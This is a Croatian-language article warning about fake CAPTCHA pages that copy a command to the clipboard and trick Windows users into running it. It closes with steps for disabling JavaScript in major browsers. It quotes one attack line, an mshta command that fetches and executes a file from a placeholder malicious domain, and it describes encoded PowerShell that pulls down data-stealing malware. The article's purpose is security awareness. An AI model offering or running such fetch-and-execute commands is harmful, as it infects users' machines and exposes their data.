Otkrivanje hakerskih trikova: korištenje lažnih CAPTCHA-a prevara korisnika da sami instaliraju zlonamjerni kod

· Sanja Ledinek

Otkrivanje hakerskih trikova korištenje lažnih CAPTCHA-a prevara korisnika da sami instaliraju zlonamjern (1)

U eri kada je internet u svakom kutku Zemlje, prevaranti postaju sve kreativniji u pokušaju da prevare korisnike. U posljednje vrijeme sve se više napada događa putem nečega s čime su korisnici interneta previše upoznati: CAPTCHA.

Akronim za “Potpuno automatizirani javni Turingov test za razlikovanje računala i ljudi”, CAPTCHA je mehanizam koji pomaže online uslugama da ograniče automatizirane posjete, što može iscrpiti poslovne resurse. Jednostavnije rečeno, CAPTCHA su prepreke koje sprječavaju stalni pristup automatiziranom softveru, što može uzrokovati zagušenje mreže. To je jednostavan alat za razlikovanje stvarnih korisnika i softvera s automatskim pristupom. Vrlo je raznolika: ponekad utipkate redak znakova koji su malo izmijenjeni, ponekad utipkate slagalicu tako da se podudara, ponekad tražite od korisnika da označi mačke, bicikl ili semafore.

Otkrivanje hakerskih trikova korištenje lažnih CAPTCHA-a prevara korisnika da sami instaliraju zlonamjern (1)

U pokušaju krađe korisničkih podataka, neki su prevaranti stvorili novu vrstu zlonamjerne CAPTCHA. Kada korisnik želi pristupiti stranici sa sadržajem kao što su filmovi, glazba, dijeljenje slika ili članci, pojavit će se poruka na sljedeći način:

Ova CAPTCHA je previše poznata: označite prazno polje kako biste potvrdili da “Ja nisam robot” – Međutim, nakon označavanja praznog okvira, korisnik će biti preusmjeren na novu adresu, prikazujući sadržaj koji zahtijeva da korisnik slijedi upute. Mnogi će korisnici biti prevareni ovim “naizgled bezopasnim” uputama, a ako ih slijede, korisnikov Windows uređaj preuzet će zlonamjerne datoteke na stroj.

Kako korisnici bivaju prevareni?

Web stranica koju je korisnik upravo posjetio kopirat će kratki dio teksta u predmemoriju uređaja (slično kao kada pritisnete Ctrl+C). Dio kopiranog/zalijepljenog sadržaja izgleda ovako:

mshta https://{ zlonamjerna domena}/media.file

U sustavu Windows “mshta” je naredba koja izvršava benignu datoteku pod nazivom mshta.exe, ali u ovom slučaju naredba će učitati i pokrenuti zlonamjernu datoteku preuzetu s druge domene. Zapravo, ove su datoteke šifrirane Powershell naredbom koja se pokreće u pozadini u sustavu i preuzima zlonamjerni kod. U nekim od testiranih slučajeva, naredba mashta preuzela je zlonamjernu datoteku, a zlonamjerna datoteka nastavila je preuzimati softver za krađu podataka na stroj.

Kako spriječiti ovaj napad?

Prije svega, moramo biti oprezni kada koristimo internet, posebno kada su zamke sve sofisticiranije. Ne slijedite sumnjive upute na Internetu, kako ne biste dobili povorku zlonamjernih datoteka na svoje računalo. Govoreći o uputama, usput, sljedeći koraci pomoći će vam da onemogućite JavaScript na nekim izvornim preglednicima Chromiuma. U osnovi, web stranica može sama kopirati tekst u predmemoriju zahvaljujući JaveScript funkciji koja se zove document.execCommand(‘copy’). Onemogućavanje JavaScripta može ograničiti napade na ovaj način, ali može uzrokovati da neke web stranice koje još uvijek koristite ne funkcioniraju ispravno.

Otkrivanje hakerskih trikova korištenje lažnih CAPTCHA-a prevara korisnika da sami instaliraju zlonamjern (

Evo kako onemogućiti JavaScript za neke popularne preglednike.

CHROME

1. Otvorite Chrome i kliknite na ikonu s tri točke u gornjem desnom kutu.

2. Odaberite Postavke s padajućeg izbornika.

3. Na lijevoj bočnoj traci kliknite Privatnost i sigurnost .

4. Odaberite Postavke web-mjesta .

5. Pomaknite se prema dolje do odjeljka Sadržaj i kliknite JavaScript .

6. Odaberite Ne dopuštaj web-mjestima upotrebu JavaScripta.

7. Također možete dodati određene web stranice na popis blokiranja ili dopuštenih klikom na svaku od odgovarajućih stavki.

MICROSOFT EDGE

1. Otvorite Microsoft Edge i kliknite na ikonu s tri točke u gornjem desnom kutu.

2. Odaberite Postavke s padajućeg izbornika.

3. Na lijevoj bočnoj traci kliknite Kolačići i dopuštenja web stranice.

4. Pomaknite se prema dolje do odjeljka Sva dopuštenja i odaberite JavaScript.

5. Okrenite prekidač da biste onemogućili JavaScript.

6. Također možete upravljati JavaScriptom za svaku stranicu tako da ih dodate na popis Blokiraj ili Dopusti.

FIREFOX

1. Upišite about:config u traku za pretraživanje, odaberite Preuzmite rizik i nastavite .

2. Upišite javascript.enabled u okvir za pretraživanje na vrhu stranice.

3. Kliknite na opciju javascript.enabled da biste promijenili vrijednost u false (onemogućite JavaScript).

OPERA

1. Otvorite Operu i kliknite ikonu Postavke.

2. Odaberite Privatnost

3. Kliknite Postavke web-mjesta .

4. Odaberite JavaScript opciju.

5. Odaberite Ne dopuštaj web-lokacijama upotrebu JavaScripta da biste onemogućili JavaScript na svim stranicama.

6. Da biste onemogućili JavaScript za određene stranice, kliknite Dodaj u odjeljku JavaScript nije dopušteno, a zatim unesite URL web stranice.

DRUGE NOVOSTI